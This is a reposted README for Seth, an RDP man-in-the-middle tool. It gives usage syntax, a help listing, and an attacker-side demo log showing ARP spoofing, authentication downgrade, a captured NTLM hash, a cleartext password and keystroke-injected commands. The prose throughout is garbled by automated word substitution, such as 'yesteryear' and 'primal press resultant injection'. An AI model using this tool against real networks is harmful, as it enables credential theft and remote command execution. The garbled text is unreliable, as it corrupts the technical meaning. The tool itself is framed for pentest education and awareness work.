Seth - Perform A Mitm Assail Together With Extract Clear Text Credentials From Rdp Connections

Seth is a tool written inwards Python in addition to Bash to MitM RDP connections yesteryear attempting to downgrade the connexion inwards guild to extract clear text credentials. It was developed to heighten awareness in addition to educate nigh the importance of properly configured RDP connections inwards the context of pentests, workshops or talks. The writer is Adrian Vollmer (SySS GmbH).

Usage
Run it similar this:

$ ./seth.sh     []

Unless the RDP host is on the same subnet every bit the victim machine, the final IP address must hold upward that of the gateway.
The final parameter is optional. It tin comprise a ascendency that is executed on the RDP host yesteryear simulating WIN+R via primal press resultant injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's solely reliable amongst the English linguistic communication U.S.A. layout. I advise avoiding exceptional characters yesteryear using powershell -enc , where STRING is your UTF-16le in addition to Base64 encoded command. However, calc should hold upward pretty universal in addition to gets the labor done.
The rhythm script performs ARP spoofing to attain a Man-in-the-Middle seat in addition to redirects the traffic such that it runs through an RDP proxy. The proxy tin hold upward called separately. This tin hold upward useful if yous desire work Seth inwards combination amongst Responder. Use Responder to attain a Man-in-the-Middle seat in addition to run Seth at the same time. Run seth.py -h for to a greater extent than information:

usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]                [-j INJECT] -c CERTFILE -k KEYFILE                target_host [target_port]  RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017  positional arguments:   target_host           target host of the RDP service   target_port           TCP port of the target RDP service (default 3389)  optional arguments:   -h, --help            demo this assistance message in addition to larn out   -d, --debug           demo debug information   -f, --fake-server     perform a 'fake server' assault   -p LISTEN_PORT, --listen-port LISTEN_PORT                         TCP port to heed on (default 3389)   -b BIND_IP, --bind-ip BIND_IP                         IP address to bind the simulated service to (default all)   -g {0,1,3,11}, --downgrade {0,1,3,11}                         downgrade the authentication protocol to this (default                            3)   -j INJECT, --inject INJECT                         ascendency to execute via primal press resultant injection   -c CERTFILE, --certfile CERTFILE                         path to the certificate file   -k KEYFILE, --keyfile KEYFILE                         path to the primal file

For to a greater extent than information read the PDF inwards doc/paper (or read the code!). The newspaper also contains recommendations for counter measures.
You tin also picket a 20 infinitesimal presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4
Or picket merely the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo
The next ouput shows the attacker's view. Seth sniffs an offline crackable hash every bit good every bit the clear text password. Here, NLA is non enforced in addition to the victim ignored the certificate warning.

# ./seth.sh eth1 192.168.57.{103,2,102} ███████╗███████╗████████╗██╗  ██╗ ██╔════╝██╔════╝╚══██╔══╝██║  ██║   yesteryear Adrian Vollmer ███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de ╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017 ███████║███████╗   ██║   ██║  ██║   https://www.syss.de ╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝ [*] Spoofing arp replies... [*] Turning on IP forwarding... [*] Set iptables rules for SYN packets... [*] Waiting for a SYN bundle to the master destination... [+] Got it! Original finish is 192.168.57.102 [*] Clone the x509 certificate of the master destination... [*] Adjust the iptables dominion for all packets... [*] Run RDP proxy... Listening for novel connexion Connection received from 192.168.57.103:50431 Downgradin   g authentication options from eleven to three Enable SSL alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000 Tamper amongst NTLM reply TLS alarm access denied, Downgrading CredSSP Connection lost Connection received from 192.168.57.103:50409 Listening for novel connexion Enable SSL Connection lost Connection rece   ived from 192.168.57.103:50410 Listening for novel connexion Enable SSL Hiding forged protocol asking from customer .\alice:ilovebob Keyboard Layout: 0x409 (English_United_States) Key press:   LShift Key press:   due south Key release:                 due south Key release:                 LShift Key press:   east Key release:                 east Key press:   C Key release:                 C Key press:   R Key release:                 R Key press:   east Key release:                 east Key press:   T Key release:                 T Connection lost [*] Cleaning up... [*] Done.

Requirements

• python3
  
• tcpdump
  
• arpspoof
arpspoof is role of dsniff
  
• openssl
  

Disclaimer
Use at your ain risk. Do non work without amount consent of everyone involved. For educational purposes only.

Download Seth